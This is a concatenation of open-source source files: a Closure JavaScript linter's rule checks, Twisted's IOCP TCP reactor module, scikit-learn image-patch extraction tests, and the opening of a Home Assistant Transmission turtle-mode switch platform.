# If there are no require statements, missing requires should be
# reported after the last provide.
if not namespaces_info.GetRequiredNamespaces():
missing_requires = namespaces_info.GetMissingRequires()
if missing_requires:
self._ReportMissingRequires(
missing_requires,
tokenutil.GetLastTokenInSameLine(token).next,
True)
elif (token.string == 'goog.require' and
not state.InFunction() and
namespaces_info is not None):
namespace = tokenutil.Search(token, Type.STRING_TEXT).string
# If there are no provide statements, missing provides should be
# reported before the first require.
if (namespaces_info.IsFirstRequire(token) and
not namespaces_info.GetProvidedNamespaces()):
missing_provides = namespaces_info.GetMissingProvides()
if missing_provides:
self._ReportMissingProvides(
missing_provides,
tokenutil.GetFirstTokenInSameLine(token),
True)
# Report extra goog.require statement.
if namespaces_info.IsExtraRequire(token):
self._HandleError(
errors.EXTRA_GOOG_REQUIRE,
'Unnecessary goog.require: ' + namespace,
token, position=Position.AtBeginning())
# Report missing goog.require statements.
if namespaces_info.IsLastRequire(token):
missing_requires = namespaces_info.GetMissingRequires()
if missing_requires:
self._ReportMissingRequires(
missing_requires,
tokenutil.GetLastTokenInSameLine(token).next,
False)
elif token.type == Type.OPERATOR:
last_in_line = token.IsLastInLine()
# If the token is unary and appears to be used in a unary context
# it's ok. Otherwise, if it's at the end of the line or immediately
# before a comment, it's ok.
# Don't report an error before a start bracket - it will be reported
# by that token's space checks.
if (not token.metadata.IsUnaryOperator() and not last_in_line
and not token.next.IsComment()
and not token.next.IsOperator(',')
and not token.next.type in (Type.WHITESPACE, Type.END_PAREN,
Type.END_BRACKET, Type.SEMICOLON,
Type.START_BRACKET)):
self._HandleError(
errors.MISSING_SPACE,
'Missing space after "%s"' % token.string,
token,
Position.AtEnd(token.string))
elif token.type == Type.WHITESPACE:
first_in_line = token.IsFirstInLine()
last_in_line = token.IsLastInLine()
# Check whitespace length if it's not the first token of the line and
# if it's not immediately before a comment.
if not last_in_line and not first_in_line and not token.next.IsComment():
# Ensure there is no space after opening parentheses.
if (token.previous.type in (Type.START_PAREN, Type.START_BRACKET,
Type.FUNCTION_NAME)
or token.next.type == Type.START_PARAMETERS):
self._HandleError(
errors.EXTRA_SPACE,
'Extra space after "%s"' % token.previous.string,
token,
Position.All(token.string))
def _ReportMissingProvides(self, missing_provides, token, need_blank_line):
"""Reports missing provide statements to the error handler.
Args:
missing_provides: A list of strings where each string is a namespace that
should be provided, but is not.
token: The token where the error was detected (also where the new provides
        will be inserted).
need_blank_line: Whether a blank line needs to be inserted after the new
provides are inserted. May be True, False, or None, where None
indicates that the insert location is unknown.
"""
self._HandleError(
errors.MISSING_GOOG_PROVIDE,
'Missing the following goog.provide statements:\n' +
'\n'.join(map(lambda x: 'goog.provide(\'%s\');' % x,
sorted(missing_provides))),
token, position=Position.AtBeginning(),
fix_data=(missing_provides, need_blank_line))
def _ReportMissingRequires(self, missing_requires, token, need_blank_line):
"""Reports missing require statements to the error handler.
Args:
missing_requires: A list of strings where each string is a namespace that
should be required, but is not.
token: The token where the error was detected (also where the new requires
        will be inserted).
need_blank_line: Whether a blank line needs to be inserted before the new
requires are inserted. May be True, False, or None, where None
indicates that the insert location is unknown.
"""
self._HandleError(
errors.MISSING_GOOG_REQUIRE,
'Missing the following goog.require statements:\n' +
'\n'.join(map(lambda x: 'goog.require(\'%s\');' % x,
sorted(missing_requires))),
token, position=Position.AtBeginning(),
fix_data=(missing_requires, need_blank_line))
def Finalize(self, state, tokenizer_mode):
"""Perform all checks that need to occur after all lines are processed."""
# Call the base class's Finalize function.
super(JavaScriptLintRules, self).Finalize(state, tokenizer_mode)
if error_check.ShouldCheck(Rule.UNUSED_PRIVATE_MEMBERS):
# Report an error for any declared private member that was never used.
unused_private_members = (self._declared_private_members -
self._used_private_members)
for variable in unused_private_members:
token = self._declared_private_member_tokens[variable]
self._HandleError(errors.UNUSED_PRIVATE_MEMBER,
'Unused private member: %s.' % token.string,
token)
# Clear state to prepare for the next file.
self._declared_private_member_tokens = {}
self._declared_private_members = Set()
self._used_private_members = Set()
namespaces_info = self._namespaces_info
if namespaces_info is not None:
# If there are no provide or require statements, missing provides and
# requires should be reported on line 1.
if (not namespaces_info.GetProvidedNamespaces() and
not namespaces_info.GetRequiredNamespaces()):
missing_provides = namespaces_info.GetMissingProvides()
if missing_provides:
self._ReportMissingProvides(
missing_provides, state.GetFirstToken(), None)
missing_requires = namespaces_info.GetMissingRequires()
if missing_requires:
self._ReportMissingRequires(
missing_requires, state.GetFirstToken(), None)
self._CheckSortedRequiresProvides(state.GetFirstToken())
def _CheckSortedRequiresProvides(self, token):
"""Checks that all goog.require and goog.provide statements are sorted.
Note that this method needs to be run after missing statements are added to
preserve alphabetical order.
Args:
token: The first token in the token stream.
"""
sorter = requireprovidesorter.RequireProvideSorter()
provides_result = sorter.CheckProvides(token)
if provides_result:
self._HandleError(
errors.GOOG_PROVIDES_NOT_ALPHABETIZED,
'goog.provide classes must be alphabetized. The correct code is:\n' +
'\n'.join(
map(lambda x: 'goog.provide(\'%s\');' % x, provides_result[1])),
provides_result[0],
position=Position.AtBeginning(),
fix_data=provides_result[0])
requires_result = sorter.CheckRequires(token)
if requires_result:
self._HandleError(
errors.GOOG_REQUIRES_NOT_ALPHABETIZED,
'goog.require classes must be alphabetized. The correct code is:\n' +
'\n'.join(
map(lambda x: 'goog.require(\'%s\');' % x, requires_result[1])),
requires_result[0],
position=Position.AtBeginning(),
fix_data=requires_result[0])
def GetLongLineExceptions(self):
"""Gets a list of regexps for lines which can be longer than the limit."""
return [
re.compile('goog\.require\(.+\);?\s*$'),
re.compile('goog\.provide\(.+\);?\s*$')
]
|
bsd-3-clause
|
candy7393/VTK
|
ThirdParty/Twisted/twisted/internet/iocpreactor/tcp.py
|
23
|
18235
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
TCP support for IOCP reactor
"""
import socket, operator, errno, struct
from zope.interface import implements, classImplements
from twisted.internet import interfaces, error, address, main, defer
from twisted.internet.abstract import _LogOwner, isIPAddress, isIPv6Address
from twisted.internet.tcp import _SocketCloser, Connector as TCPConnector
from twisted.internet.tcp import _AbortingMixin, _BaseBaseClient, _BaseTCPClient
from twisted.python import log, failure, reflect, util
from twisted.internet.iocpreactor import iocpsupport as _iocp, abstract
from twisted.internet.iocpreactor.interfaces import IReadWriteHandle
from twisted.internet.iocpreactor.const import ERROR_IO_PENDING
from twisted.internet.iocpreactor.const import SO_UPDATE_CONNECT_CONTEXT
from twisted.internet.iocpreactor.const import SO_UPDATE_ACCEPT_CONTEXT
from twisted.internet.iocpreactor.const import ERROR_CONNECTION_REFUSED
from twisted.internet.iocpreactor.const import ERROR_NETWORK_UNREACHABLE
try:
from twisted.internet._newtls import startTLS as _startTLS
except ImportError:
_startTLS = None
# ConnectEx returns these. XXX: find out what it does for timeout
connectExErrors = {
ERROR_CONNECTION_REFUSED: errno.WSAECONNREFUSED,
ERROR_NETWORK_UNREACHABLE: errno.WSAENETUNREACH,
}
class Connection(abstract.FileHandle, _SocketCloser, _AbortingMixin):
"""
@ivar TLS: C{False} to indicate the connection is in normal TCP mode,
C{True} to indicate that TLS has been started and that operations must
be routed through the L{TLSMemoryBIOProtocol} instance.
"""
implements(IReadWriteHandle, interfaces.ITCPTransport,
interfaces.ISystemHandle)
TLS = False
def __init__(self, sock, proto, reactor=None):
abstract.FileHandle.__init__(self, reactor)
self.socket = sock
self.getFileHandle = sock.fileno
self.protocol = proto
def getHandle(self):
return self.socket
def dataReceived(self, rbuffer):
# XXX: some day, we'll have protocols that can handle raw buffers
self.protocol.dataReceived(str(rbuffer))
def readFromHandle(self, bufflist, evt):
return _iocp.recv(self.getFileHandle(), bufflist, evt)
def writeToHandle(self, buff, evt):
"""
Send C{buff} to current file handle using C{_iocp.send}. The buffer
sent is limited to a size of C{self.SEND_LIMIT}.
"""
return _iocp.send(self.getFileHandle(),
buffer(buff, 0, self.SEND_LIMIT), evt)
def _closeWriteConnection(self):
try:
self.socket.shutdown(1)
except socket.error:
pass
p = interfaces.IHalfCloseableProtocol(self.protocol, None)
if p:
try:
p.writeConnectionLost()
except:
f = failure.Failure()
log.err()
self.connectionLost(f)
def readConnectionLost(self, reason):
p = interfaces.IHalfCloseableProtocol(self.protocol, None)
if p:
try:
p.readConnectionLost()
except:
log.err()
self.connectionLost(failure.Failure())
else:
self.connectionLost(reason)
def connectionLost(self, reason):
if self.disconnected:
return
abstract.FileHandle.connectionLost(self, reason)
isClean = (reason is None or
not reason.check(error.ConnectionAborted))
self._closeSocket(isClean)
protocol = self.protocol
del self.protocol
del self.socket
del self.getFileHandle
protocol.connectionLost(reason)
def logPrefix(self):
"""
Return the prefix to log with when I own the logging thread.
"""
return self.logstr
def getTcpNoDelay(self):
return operator.truth(self.socket.getsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY))
def setTcpNoDelay(self, enabled):
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, enabled)
def getTcpKeepAlive(self):
return operator.truth(self.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_KEEPALIVE))
def setTcpKeepAlive(self, enabled):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, enabled)
if _startTLS is not None:
def startTLS(self, contextFactory, normal=True):
"""
@see: L{ITLSTransport.startTLS}
"""
_startTLS(self, contextFactory, normal, abstract.FileHandle)
def write(self, data):
"""
Write some data, either directly to the underlying handle or, if TLS
has been started, to the L{TLSMemoryBIOProtocol} for it to encrypt and
send.
@see: L{ITCPTransport.write}
"""
if self.disconnected:
return
if self.TLS:
self.protocol.write(data)
else:
abstract.FileHandle.write(self, data)
def writeSequence(self, iovec):
"""
Write some data, either directly to the underlying handle or, if TLS
has been started, to the L{TLSMemoryBIOProtocol} for it to encrypt and
send.
@see: L{ITCPTransport.writeSequence}
"""
if self.disconnected:
return
if self.TLS:
self.protocol.writeSequence(iovec)
else:
abstract.FileHandle.writeSequence(self, iovec)
def loseConnection(self, reason=None):
"""
Close the underlying handle or, if TLS has been started, first shut it
down.
@see: L{ITCPTransport.loseConnection}
"""
if self.TLS:
if self.connected and not self.disconnecting:
self.protocol.loseConnection()
else:
abstract.FileHandle.loseConnection(self, reason)
def registerProducer(self, producer, streaming):
"""
Register a producer.
If TLS is enabled, the TLS connection handles this.
"""
if self.TLS:
# Registering a producer before we're connected shouldn't be a
# problem. If we end up with a write(), that's already handled in
# the write() code above, and there are no other potential
# side-effects.
self.protocol.registerProducer(producer, streaming)
else:
abstract.FileHandle.registerProducer(self, producer, streaming)
def unregisterProducer(self):
"""
Unregister a producer.
If TLS is enabled, the TLS connection handles this.
"""
if self.TLS:
self.protocol.unregisterProducer()
else:
abstract.FileHandle.unregisterProducer(self)
if _startTLS is not None:
classImplements(Connection, interfaces.ITLSTransport)
class Client(_BaseBaseClient, _BaseTCPClient, Connection):
"""
@ivar _tlsClientDefault: Always C{True}, indicating that this is a client
connection, and by default when TLS is negotiated this class will act as
a TLS client.
"""
addressFamily = socket.AF_INET
socketType = socket.SOCK_STREAM
_tlsClientDefault = True
_commonConnection = Connection
def __init__(self, host, port, bindAddress, connector, reactor):
# ConnectEx documentation says socket _has_ to be bound
if bindAddress is None:
bindAddress = ('', 0)
self.reactor = reactor # createInternetSocket needs this
_BaseTCPClient.__init__(self, host, port, bindAddress, connector,
reactor)
def createInternetSocket(self):
"""
Create a socket registered with the IOCP reactor.
@see: L{_BaseTCPClient}
"""
return self.reactor.createSocket(self.addressFamily, self.socketType)
def _collectSocketDetails(self):
"""
Clean up potentially circular references to the socket and to its
C{getFileHandle} method.
@see: L{_BaseBaseClient}
"""
del self.socket, self.getFileHandle
def _stopReadingAndWriting(self):
"""
Remove the active handle from the reactor.
@see: L{_BaseBaseClient}
"""
self.reactor.removeActiveHandle(self)
def cbConnect(self, rc, bytes, evt):
if rc:
rc = connectExErrors.get(rc, rc)
self.failIfNotConnected(error.getConnectError((rc,
errno.errorcode.get(rc, 'Unknown error'))))
else:
self.socket.setsockopt(
socket.SOL_SOCKET, SO_UPDATE_CONNECT_CONTEXT,
struct.pack('P', self.socket.fileno()))
self.protocol = self.connector.buildProtocol(self.getPeer())
self.connected = True
logPrefix = self._getLogPrefix(self.protocol)
self.logstr = logPrefix + ",client"
self.protocol.makeConnection(self)
self.startReading()
def doConnect(self):
if not hasattr(self, "connector"):
# this happens if we connector.stopConnecting in
# factory.startedConnecting
return
assert _iocp.have_connectex
self.reactor.addActiveHandle(self)
evt = _iocp.Event(self.cbConnect, self)
rc = _iocp.connect(self.socket.fileno(), self.realAddress, evt)
if rc and rc != ERROR_IO_PENDING:
self.cbConnect(rc, 0, evt)
class Server(Connection):
"""
Serverside socket-stream connection class.
I am a serverside network connection transport; a socket which came from an
accept() on a server.
@ivar _tlsClientDefault: Always C{False}, indicating that this is a server
connection, and by default when TLS is negotiated this class will act as
a TLS server.
"""
_tlsClientDefault = False
def __init__(self, sock, protocol, clientAddr, serverAddr, sessionno, reactor):
"""
Server(sock, protocol, client, server, sessionno)
Initialize me with a socket, a protocol, a descriptor for my peer (a
tuple of host, port describing the other end of the connection), an
instance of Port, and a session number.
"""
Connection.__init__(self, sock, protocol, reactor)
self.serverAddr = serverAddr
self.clientAddr = clientAddr
self.sessionno = sessionno
logPrefix = self._getLogPrefix(self.protocol)
self.logstr = "%s,%s,%s" % (logPrefix, sessionno, self.clientAddr.host)
self.repstr = "<%s #%s on %s>" % (self.protocol.__class__.__name__,
self.sessionno, self.serverAddr.port)
self.connected = True
self.startReading()
def __repr__(self):
"""
A string representation of this connection.
"""
return self.repstr
def getHost(self):
"""
Returns an IPv4Address.
This indicates the server's address.
"""
return self.serverAddr
def getPeer(self):
"""
Returns an IPv4Address.
This indicates the client's address.
"""
return self.clientAddr
class Connector(TCPConnector):
def _makeTransport(self):
return Client(self.host, self.port, self.bindAddress, self,
self.reactor)
class Port(_SocketCloser, _LogOwner):
implements(interfaces.IListeningPort)
connected = False
disconnected = False
disconnecting = False
addressFamily = socket.AF_INET
socketType = socket.SOCK_STREAM
_addressType = address.IPv4Address
sessionno = 0
# Actual port number being listened on, only set to a non-None
# value when we are actually listening.
_realPortNumber = None
# A string describing the connections which will be created by this port.
# Normally this is C{"TCP"}, since this is a TCP port, but when the TLS
# implementation re-uses this class it overrides the value with C{"TLS"}.
# Only used for logging.
_type = 'TCP'
def __init__(self, port, factory, backlog=50, interface='', reactor=None):
self.port = port
self.factory = factory
self.backlog = backlog
self.interface = interface
self.reactor = reactor
if isIPv6Address(interface):
self.addressFamily = socket.AF_INET6
self._addressType = address.IPv6Address
def __repr__(self):
if self._realPortNumber is not None:
return "<%s of %s on %s>" % (self.__class__,
self.factory.__class__,
self._realPortNumber)
else:
return "<%s of %s (not listening)>" % (self.__class__,
self.factory.__class__)
def startListening(self):
try:
skt = self.reactor.createSocket(self.addressFamily,
self.socketType)
# TODO: resolve self.interface if necessary
if self.addressFamily == socket.AF_INET6:
addr = socket.getaddrinfo(self.interface, self.port)[0][4]
else:
addr = (self.interface, self.port)
skt.bind(addr)
except socket.error, le:
raise error.CannotListenError, (self.interface, self.port, le)
self.addrLen = _iocp.maxAddrLen(skt.fileno())
# Make sure that if we listened on port 0, we update that to
# reflect what the OS actually assigned us.
self._realPortNumber = skt.getsockname()[1]
log.msg("%s starting on %s" % (self._getLogPrefix(self.factory),
self._realPortNumber))
self.factory.doStart()
skt.listen(self.backlog)
self.connected = True
self.disconnected = False
self.reactor.addActiveHandle(self)
self.socket = skt
self.getFileHandle = self.socket.fileno
self.doAccept()
def loseConnection(self, connDone=failure.Failure(main.CONNECTION_DONE)):
"""
Stop accepting connections on this port.
This will shut down my socket and call self.connectionLost().
It returns a deferred which will fire successfully when the
port is actually closed.
"""
self.disconnecting = True
if self.connected:
self.deferred = defer.Deferred()
self.reactor.callLater(0, self.connectionLost, connDone)
return self.deferred
stopListening = loseConnection
def _logConnectionLostMsg(self):
"""
Log message for closing port
"""
log.msg('(%s Port %s Closed)' % (self._type, self._realPortNumber))
def connectionLost(self, reason):
"""
Cleans up the socket.
"""
self._logConnectionLostMsg()
self._realPortNumber = None
d = None
if hasattr(self, "deferred"):
d = self.deferred
del self.deferred
self.disconnected = True
self.reactor.removeActiveHandle(self)
self.connected = False
self._closeSocket(True)
del self.socket
del self.getFileHandle
try:
self.factory.doStop()
except:
self.disconnecting = False
if d is not None:
d.errback(failure.Failure())
else:
raise
else:
self.disconnecting = False
if d is not None:
d.callback(None)
def logPrefix(self):
"""
Returns the name of my class, to prefix log entries with.
"""
return reflect.qual(self.factory.__class__)
def getHost(self):
"""
Returns an IPv4Address.
This indicates the server's address.
"""
host, port = self.socket.getsockname()[:2]
return self._addressType('TCP', host, port)
def cbAccept(self, rc, bytes, evt):
self.handleAccept(rc, evt)
if not (self.disconnecting or self.disconnected):
self.doAccept()
def handleAccept(self, rc, evt):
if self.disconnecting or self.disconnected:
return False
# possible errors:
# (WSAEMFILE, WSAENOBUFS, WSAENFILE, WSAENOMEM, WSAECONNABORTED)
if rc:
log.msg("Could not accept new connection -- %s (%s)" %
(errno.errorcode.get(rc, 'unknown error'), rc))
return False
else:
evt.newskt.setsockopt(
socket.SOL_SOCKET, SO_UPDATE_ACCEPT_CONTEXT,
struct.pack('P', self.socket.fileno()))
family, lAddr, rAddr = _iocp.get_accept_addrs(evt.newskt.fileno(),
evt.buff)
assert family == self.addressFamily
protocol = self.factory.buildProtocol(
self._addressType('TCP', rAddr[0], rAddr[1]))
if protocol is None:
evt.newskt.close()
else:
s = self.sessionno
self.sessionno = s+1
transport = Server(evt.newskt, protocol,
self._addressType('TCP', rAddr[0], rAddr[1]),
self._addressType('TCP', lAddr[0], lAddr[1]),
s, self.reactor)
protocol.makeConnection(transport)
return True
def doAccept(self):
evt = _iocp.Event(self.cbAccept, self)
# see AcceptEx documentation
evt.buff = buff = _iocp.AllocateReadBuffer(2 * (self.addrLen + 16))
evt.newskt = newskt = self.reactor.createSocket(self.addressFamily,
self.socketType)
rc = _iocp.accept(self.socket.fileno(), newskt.fileno(), buff, evt)
if rc and rc != ERROR_IO_PENDING:
self.handleAccept(rc, evt)
|
bsd-3-clause
|
aminert/scikit-learn
|
sklearn/feature_extraction/tests/test_image.py
|
205
|
10378
|
# Authors: Emmanuelle Gouillart <emmanuelle.gouillart@normalesup.org>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# License: BSD 3 clause
import numpy as np
import scipy as sp
from scipy import ndimage
from nose.tools import assert_equal, assert_true
from numpy.testing import assert_raises
from sklearn.feature_extraction.image import (
img_to_graph, grid_to_graph, extract_patches_2d,
reconstruct_from_patches_2d, PatchExtractor, extract_patches)
from sklearn.utils.graph import connected_components
def test_img_to_graph():
x, y = np.mgrid[:4, :4] - 10
grad_x = img_to_graph(x)
grad_y = img_to_graph(y)
assert_equal(grad_x.nnz, grad_y.nnz)
# Negative elements are the diagonal: the elements of the original
# image. Positive elements are the values of the gradient, they
# should all be equal on grad_x and grad_y
np.testing.assert_array_equal(grad_x.data[grad_x.data > 0],
grad_y.data[grad_y.data > 0])
def test_grid_to_graph():
    # Checking that the function works with graphs containing no edges
size = 2
roi_size = 1
# Generating two convex parts with one vertex
# Thus, edges will be empty in _to_graph
mask = np.zeros((size, size), dtype=np.bool)
mask[0:roi_size, 0:roi_size] = True
mask[-roi_size:, -roi_size:] = True
mask = mask.reshape(size ** 2)
A = grid_to_graph(n_x=size, n_y=size, mask=mask, return_as=np.ndarray)
assert_true(connected_components(A)[0] == 2)
# Checking that the function works whatever the type of mask is
mask = np.ones((size, size), dtype=np.int16)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask)
assert_true(connected_components(A)[0] == 1)
# Checking dtype of the graph
mask = np.ones((size, size))
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.bool)
assert_true(A.dtype == np.bool)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.int)
assert_true(A.dtype == np.int)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.float)
assert_true(A.dtype == np.float)
def test_connect_regions():
lena = sp.misc.lena()
for thr in (50, 150):
mask = lena > thr
graph = img_to_graph(lena, mask)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
def test_connect_regions_with_grid():
lena = sp.misc.lena()
mask = lena > 50
graph = grid_to_graph(*lena.shape, mask=mask)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
mask = lena > 150
graph = grid_to_graph(*lena.shape, mask=mask, dtype=None)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
def _downsampled_lena():
lena = sp.misc.lena().astype(np.float32)
lena = (lena[::2, ::2] + lena[1::2, ::2] + lena[::2, 1::2]
+ lena[1::2, 1::2])
lena = (lena[::2, ::2] + lena[1::2, ::2] + lena[::2, 1::2]
+ lena[1::2, 1::2])
lena = lena.astype(np.float)
lena /= 16.0
return lena
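# Added commentary: the two block-sum passes above average each 4x4
# neighbourhood (2x2 downsampling applied twice), so the 512x512 lena image
# becomes 128x128, and dividing by 16 restores the original intensity scale.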
def _orange_lena(lena=None):
lena = _downsampled_lena() if lena is None else lena
lena_color = np.zeros(lena.shape + (3,))
lena_color[:, :, 0] = 256 - lena
lena_color[:, :, 1] = 256 - lena / 2
lena_color[:, :, 2] = 256 - lena / 4
return lena_color
def _make_images(lena=None):
lena = _downsampled_lena() if lena is None else lena
# make a collection of lenas
images = np.zeros((3,) + lena.shape)
images[0] = lena
images[1] = lena + 1
images[2] = lena + 2
return images
downsampled_lena = _downsampled_lena()
orange_lena = _orange_lena(downsampled_lena)
lena_collection = _make_images(downsampled_lena)
def test_extract_patches_all():
lena = downsampled_lena
i_h, i_w = lena.shape
p_h, p_w = 16, 16
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(lena, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
def test_extract_patches_all_color():
lena = orange_lena
i_h, i_w = lena.shape[:2]
p_h, p_w = 16, 16
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(lena, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w, 3))
def test_extract_patches_all_rect():
lena = downsampled_lena
lena = lena[:, 32:97]
i_h, i_w = lena.shape
p_h, p_w = 16, 12
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(lena, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
def test_extract_patches_max_patches():
lena = downsampled_lena
i_h, i_w = lena.shape
p_h, p_w = 16, 16
patches = extract_patches_2d(lena, (p_h, p_w), max_patches=100)
assert_equal(patches.shape, (100, p_h, p_w))
expected_n_patches = int(0.5 * (i_h - p_h + 1) * (i_w - p_w + 1))
patches = extract_patches_2d(lena, (p_h, p_w), max_patches=0.5)
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
assert_raises(ValueError, extract_patches_2d, lena, (p_h, p_w),
max_patches=2.0)
assert_raises(ValueError, extract_patches_2d, lena, (p_h, p_w),
max_patches=-1.0)
def test_reconstruct_patches_perfect():
lena = downsampled_lena
p_h, p_w = 16, 16
patches = extract_patches_2d(lena, (p_h, p_w))
lena_reconstructed = reconstruct_from_patches_2d(patches, lena.shape)
np.testing.assert_array_equal(lena, lena_reconstructed)
def test_reconstruct_patches_perfect_color():
lena = orange_lena
p_h, p_w = 16, 16
patches = extract_patches_2d(lena, (p_h, p_w))
lena_reconstructed = reconstruct_from_patches_2d(patches, lena.shape)
np.testing.assert_array_equal(lena, lena_reconstructed)
def test_patch_extractor_fit():
lenas = lena_collection
extr = PatchExtractor(patch_size=(8, 8), max_patches=100, random_state=0)
assert_true(extr == extr.fit(lenas))
def test_patch_extractor_max_patches():
lenas = lena_collection
i_h, i_w = lenas.shape[1:3]
p_h, p_w = 8, 8
max_patches = 100
expected_n_patches = len(lenas) * max_patches
extr = PatchExtractor(patch_size=(p_h, p_w), max_patches=max_patches,
random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
max_patches = 0.5
expected_n_patches = len(lenas) * int((i_h - p_h + 1) * (i_w - p_w + 1)
* max_patches)
extr = PatchExtractor(patch_size=(p_h, p_w), max_patches=max_patches,
random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
def test_patch_extractor_max_patches_default():
lenas = lena_collection
extr = PatchExtractor(max_patches=100, random_state=0)
patches = extr.transform(lenas)
assert_equal(patches.shape, (len(lenas) * 100, 12, 12))
def test_patch_extractor_all_patches():
lenas = lena_collection
i_h, i_w = lenas.shape[1:3]
p_h, p_w = 8, 8
expected_n_patches = len(lenas) * (i_h - p_h + 1) * (i_w - p_w + 1)
extr = PatchExtractor(patch_size=(p_h, p_w), random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
def test_patch_extractor_color():
lenas = _make_images(orange_lena)
i_h, i_w = lenas.shape[1:3]
p_h, p_w = 8, 8
expected_n_patches = len(lenas) * (i_h - p_h + 1) * (i_w - p_w + 1)
extr = PatchExtractor(patch_size=(p_h, p_w), random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w, 3))
def test_extract_patches_strided():
image_shapes_1D = [(10,), (10,), (11,), (10,)]
patch_sizes_1D = [(1,), (2,), (3,), (8,)]
patch_steps_1D = [(1,), (1,), (4,), (2,)]
expected_views_1D = [(10,), (9,), (3,), (2,)]
last_patch_1D = [(10,), (8,), (8,), (2,)]
image_shapes_2D = [(10, 20), (10, 20), (10, 20), (11, 20)]
patch_sizes_2D = [(2, 2), (10, 10), (10, 11), (6, 6)]
patch_steps_2D = [(5, 5), (3, 10), (3, 4), (4, 2)]
expected_views_2D = [(2, 4), (1, 2), (1, 3), (2, 8)]
last_patch_2D = [(5, 15), (0, 10), (0, 8), (4, 14)]
image_shapes_3D = [(5, 4, 3), (3, 3, 3), (7, 8, 9), (7, 8, 9)]
patch_sizes_3D = [(2, 2, 3), (2, 2, 2), (1, 7, 3), (1, 3, 3)]
patch_steps_3D = [(1, 2, 10), (1, 1, 1), (2, 1, 3), (3, 3, 4)]
expected_views_3D = [(4, 2, 1), (2, 2, 2), (4, 2, 3), (3, 2, 2)]
last_patch_3D = [(3, 2, 0), (1, 1, 1), (6, 1, 6), (6, 3, 4)]
image_shapes = image_shapes_1D + image_shapes_2D + image_shapes_3D
patch_sizes = patch_sizes_1D + patch_sizes_2D + patch_sizes_3D
patch_steps = patch_steps_1D + patch_steps_2D + patch_steps_3D
expected_views = expected_views_1D + expected_views_2D + expected_views_3D
last_patches = last_patch_1D + last_patch_2D + last_patch_3D
for (image_shape, patch_size, patch_step, expected_view,
last_patch) in zip(image_shapes, patch_sizes, patch_steps,
expected_views, last_patches):
image = np.arange(np.prod(image_shape)).reshape(image_shape)
patches = extract_patches(image, patch_shape=patch_size,
extraction_step=patch_step)
ndim = len(image_shape)
assert_true(patches.shape[:ndim] == expected_view)
last_patch_slices = [slice(i, i + j, None) for i, j in
zip(last_patch, patch_size)]
assert_true((patches[[slice(-1, None, None)] * ndim] ==
image[last_patch_slices].squeeze()).all())
def test_extract_patches_square():
# test same patch size for all dimensions
lena = downsampled_lena
i_h, i_w = lena.shape
p = 8
expected_n_patches = ((i_h - p + 1), (i_w - p + 1))
patches = extract_patches(lena, patch_shape=p)
assert_true(patches.shape == (expected_n_patches[0], expected_n_patches[1],
p, p))
def test_width_patch():
# width and height of the patch should be less than the image
x = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
assert_raises(ValueError, extract_patches_2d, x, (4, 1))
assert_raises(ValueError, extract_patches_2d, x, (1, 4))
|
bsd-3-clause
|
dmeulen/home-assistant
|
homeassistant/components/switch/transmission.py
|
29
|
3112
|
"""
Support for setting the Transmission BitTorrent client Turtle Mode.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/switch.transmission/
"""
import logging
import voluptuous as vol
from homeassistant.components.switch import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_HOST, CONF_NAME, CONF_PORT, CONF_PASSWORD, CONF_USERNAME, STATE_OFF,
STATE_ON)
from homeassistant.helpers.entity import ToggleEntity
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['transmissionrpc==0.11']
_LOGGING = logging.getLogger(__name__)
DEFAULT_NAME = 'Transmission Turtle Mode'
DEFAULT_PORT = 9091
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_USERNAME): cv.string,
})
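# A minimal configuration sketch (illustrative only; the host, credentials,
# and name below are hypothetical, and the optional keys fall back to the
# defaults declared in PLATFORM_SCHEMA above):
#
#   switch:
#     - platform: transmission
#       host: 192.168.1.10
#       port: 9091
#       username: transmission
#       password: YOUR_PASSWORD
#       name: Transmission Turtle Mode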
# pylint: disable=unused-argument
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Set up the Transmission switch."""
import transmissionrpc
from transmissionrpc.error import TransmissionError
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
port = config.get(CONF_PORT)
transmission_api = transmissionrpc.Client(
host, port=port, user=username, password=password)
try:
transmission_api.session_stats()
except TransmissionError:
_LOGGING.error("Connection to Transmission API failed")
return False
add_devices([TransmissionSwitch(transmission_api, name)])
class TransmissionSwitch(ToggleEntity):
"""Representation of a Transmission switch."""
